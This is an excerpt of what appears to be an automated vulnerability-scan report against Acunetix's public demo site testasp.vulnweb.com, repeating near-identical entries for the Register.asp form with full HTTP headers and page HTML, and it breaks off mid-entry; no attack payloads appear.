Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=34 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:04 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=35 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:04 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=36 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:04 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=37 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:05 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=38 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:05 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=39 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:05 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 374 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=4 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:00 GMT Content-Length: 3550 |
Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=40 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:05 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web 